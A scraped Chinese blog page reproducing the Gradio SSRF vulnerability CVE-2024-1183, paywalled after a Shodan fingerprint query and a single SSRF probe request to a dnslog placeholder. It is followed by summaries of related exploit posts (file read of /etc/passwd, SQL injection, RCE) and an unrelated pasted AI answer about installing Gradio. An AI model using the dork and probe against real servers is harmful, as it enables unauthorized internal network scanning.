【漏洞复现】Gradio file SSRF漏洞(CVE-2024-1183)

最新推荐文章于 2025-05-21 14:14:56 发布
最新推荐文章于 2025-05-21 14:14:56 发布
阅读量782 收藏
点赞数 2
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67810151/article/details/138276378
本文详细介绍了Gradio库的一个SSRF漏洞,该漏洞允许未授权攻击者通过操纵GET请求的'file'参数探测内部网络端口。攻击者可以依据响应中的'Location'标头或'File not allowed'错误来判断端口状态。文章包括产品简介、漏洞概述、测绘语句、漏洞复现、影响范围和免责声明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 产品简介

Gradio是一个用于创建机器学习模型交互式界面的Python库。它可以帮助用户快速地为模型构建一个可视化的、易于使用的Web界面,无需编写任何Web前端代码。通过Gradio,用户可以定义输入组件和输出组件,以接收用户输入和展示模型的预测结果。此外,Gradio支持多种不同类型的输入(如文本、图像、音频等)和输出(如文本、图像、HTML等),并可以与大多数Python机器学习框架(如TensorFlow、PyTorch等)和常见的数据处理库(如NumPy、Pandas等)无缝集成。

0x02 漏洞概述

Gradio存在SSRF漏洞,未授权的攻击者可以通过该漏洞扫描和识别内部网络中的开放端口,通过操纵GET请求中的"file"参数,攻击者可以根据响应中是否存在"Location"标头或"File not allowed"错误来辨别内部端口的状态。

0x03 测绘语句

shodan:html:"__gradio_mode__"

0x04 漏洞复现

GET /file=http://{
  
  {dnslog}} HTTP/1.1

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Gradio component_server 任意文件读取漏洞复现(CVE-2024-1561)
0xSec
05-17 776
Gradio的/component_server接口不正确地允许使用攻击者控制的参数调用`Component`类的任何方法。具体来说,通过利用`Block`类的`move_resource_to_block_cache()`方法,攻击者可以将文件系统上的任何文件复制到临时目录,然后检索它。
蓝网科技临床浏览系统 deleteStudy SQL注入漏洞复现(CVE-2024-4257)
0xSec
04-29 1750
蓝网科技临床浏览系统 deleteStudy接口处SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
CVE-2024-1561 Gradio component_server存在任意文件读取漏洞
wan___she__pi的博客
05-24 565
Gradio是一个用于构建快速原型和部署机器学习模型的Python库,可以将模型转化为交互式应用程序,并支持各种类型的输入和输出界面,自定义样式和布局,以及异常情况处理。该漏洞Gradio应用程序中的/component_server端点中缺乏授权检查,攻击者可以使用任意参数调用Component类上的任何方法,通过将目标指向基础Block类的move_resource_to_block_cache方法来利用此漏洞
Gradio任意文件读取(CVE-2024-1561)漏洞复现
一纸荒芜的博客
05-17 1624
Gradio任意文件读取(CVE-2024-1561)漏洞复现
CVE-2024-1561
最新发布
ubaichu的博客
05-21 615
漏洞源于 component_server 端点未对 Component 类的方法调用进行权限校验,允许攻击者通过参数注入调用敏感方法。Gradio是一个Python库,允许用户无需编写前端代码即可为机器学习模型快速构建Web界面。方法,将服务器上的任意文件复制到临时目录,并进一步读取其内容,从而实现任意文件读取。Gradio任意文件读取(CVE-2024-1561)漏洞。构造请求,将/etc/passwd复制到临时目录。当引用相关版本的Gradio库时,会产生漏洞。使用vulhub靶场。
CVE复现计划】CVE-2024-0195
m0_63138919的博客
04-05 1736
本文以春秋云镜为靶场,进行该CVE-2024-0195的漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
WordPress Automatic插件 SQL注入漏洞复现(CVE-2024-27956)
0xSec
05-01 1881
WordPress Automatic 插件3.92.1之前版本中存在SQL注入漏洞,该漏洞源于插件的用户身份验证机制,威胁者可以绕过该机制执行恶意SQL查询,将任意SQL代码注入网站的数据库并实现权限提升。成功利用该漏洞可能获得对网站的未授权访问、创建管理员帐户、上传恶意文件,并可能完全控制受影响的网站。
CVE-2022-24124复现
giaogiaogioao的博客
11-26 944
CVE-2022-24124复现
漏洞复现】Adobe ColdFusion 任意文件读取漏洞 CVE-2024-20767
失心少年
04-23 957
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!该平台ColdFusion 2023
网络安全---漏洞复现】Tomcat CVE-2024-1938 漏洞复现和利用过程(特详细)
2401_83946826的博客
04-16 1980
python2 ‘Tomcat-ROOT路径下文件读取(CVE-2020-1938).py’ -p 8009 -f /WEB-INF/web.xml 192.168.31.160。
Progress Kemp LoadMaster 远程命令执行漏洞复现(CVE-2024-1212)
0xSec
05-01 1255
Progress Kemp LoadMaster 存在远程命令执行漏洞,未经身份验证的远程攻击者可可利用此类洞写入后门文件执行任意命令,导致服务器被控。
Rebuild企业管理系统 SSRF漏洞复现(CVE-2024-1021)
0xSec
02-08 898
Rebuild 3.5.5 版本存在安全漏洞,该漏洞源于组件 HTTP Request Handler 的 readRawText 函数的 url 参数存在服务器端请求伪造漏洞
福建科立讯通信 指挥调度管理平台 SQL注入漏洞复现(CVE-2024-2620、CVE-2024-2621、CVE-2024-2622、CVE-2024-2566)
0xSec
03-22 1342
福建科立讯通信指挥调度管理平台 down_file.php、pwd_update.php、editemedia.php、get_extension_yl.php、get_extension_yl.php等接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现-wordpress RCE-CVE-2024-25600(1)2024年最新网络安全面试题库
m0_54903333的博客
04-11 449
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
GeoServer SQL 注入漏洞复现CVE-2024-25157)附poc_geoserverl漏洞
2401_83974660的博客
04-13 1119
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。
WordPress MasterStudy LMS插件 SQL注入漏洞复现(CVE-2024-1512)
0xSec
05-05 1022
WordPress Plugin MasterStudy LMS 3.2.5 版本及之前版本存在安全漏洞,该漏洞源于对用户提供的参数转义不足,导致可以通过 /lms/stm-lms/order/items REST 路由的 user 参数进行基于联合的 SQL 注入。
PHP命令执行漏洞CVE-2024-1874复现
A1andNS's Blog
04-17 1111
CVE-2024-1874漏洞复现
CrushFTP 服务器端模板注入漏洞复现(CVE-2024-4040)
0xSec
04-26 1188
由于CrushFTP 存在服务器端模板注入漏洞,未经身份验证的远程攻击者可以逃避虚拟文件系统(VFS)沙箱,绕过身份验证获得管理访问权限,泄露敏感信息或执行代码。目前该漏洞技术细节与PoC已在互联网上公开,鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。
Downloading gradio-5.22.0-py3-none-any.whl
03-20
<think>好的,用户想要下载Gradio库的特定版本5.22.0的wheel文件。首先,我需要确认用户的环境是否支持直接通过pip安装,或者是否需要手动下载wheel文件。用户之前可能遇到了需要Rust编译器的问题,引用[1]提到过,如果pip版本过旧,可能无法安装预构建的wheel,从而需要Rust编译器。所以用户可能遇到了类似的问题,想要直接下载wheel文件来避免编译依赖。 接下来,我应该检查Gradio 5.22.0在PyPI上的可用性。访问PyPI的Gradio页面,查看历史版本是否存在5.22.0的wheel文件。假设存在的话,用户可以使用pip下载命令来获取。如果用户的环境无法直接安装,可能需要手动下载。 另外,用户提到在云端环境配置A100 GPU,引用[2]可能涉及到环境配置的问题。用户可能是在类似Google Colab的环境中操作,需要注意系统架构和Python版本是否匹配wheel文件。 然后,考虑到用户可能遇到pip版本过旧的问题,需要提醒用户升级pip,这有助于确保能够正确处理wheel文件的安装。同时,如果用户需要手动下载,指导他们从PyPI或其他可信源获取,并注意平台和Python版本的兼容性,比如Linux的许多wheel文件是manylinux版本,而Windows和MacOS有不同的命名规则。 最后,用户可能担心依赖问题,特别是如果Gradio 5.22.0有特定依赖版本要求,需要确保这些依赖也被正确安装。此外,如果用户在使用过程中遇到问题,可能需要检查错误信息,确认是否与架构或依赖有关,并考虑使用虚拟环境隔离安装。 总结步骤:检查PyPI是否存在该版本的wheel,提供pip下载命令,提醒升级pip,手动下载的注意事项,依赖处理,以及故障排除建议。需要确保回答清晰,分步骤,并且引用相关的用户引用内容,如避免Rust编译的问题。</think>要下载Gradio库的特定版本5.22.0的wheel文件,可按照以下步骤操作: --- ### **1. 直接通过pip下载wheel** ```bash pip download gradio==5.22.0 --no-deps ``` - **作用**:仅下载Gradio 5.22.0的wheel文件(不安装依赖) - **输出路径**:默认保存在当前目录的`gradio-5.22.0-py3-none-any.whl`(文件名可能因平台而异) - **注意事项**: - 如果遇到`ERROR: Could not find a version`,需检查PyPI是否提供该版本的预编译包[^1] - 若需升级pip版本:`pip install --upgrade pip` --- ### **2. 手动从PyPI下载** 1. 访问Gradio的PyPI页面:https://pypi.org/project/gradio/5.22.0/#files 2. 根据系统选择对应的wheel文件: - **Linux**: `gradio-5.22.0-py3-none-any.whl` - **Windows**: `gradio-5.22.0-py3-none-any.whl` - **MacOS**: 同上 3. 下载后通过pip安装: ```bash pip install /path/to/gradio-5.22.0-py3-none-any.whl ``` --- ### **3. 云端环境适配(如Google Colab)** - **GPU配置**:确保已正确配置A100/A10G等GPU环境[^2] - **依赖冲突处理**: ```bash pip install gradio==5.22.0 --force-reinstall ``` --- ### **4. 常见问题排查** - **Rust编译器错误**:若提示需Rust环境,说明PyPI未提供预编译包,需升级pip或改用其他版本[^1] - **量化模型适配**:注意部分库版本可能对量化模型(如Int4)支持不完善[^3] ---
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

从不学安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值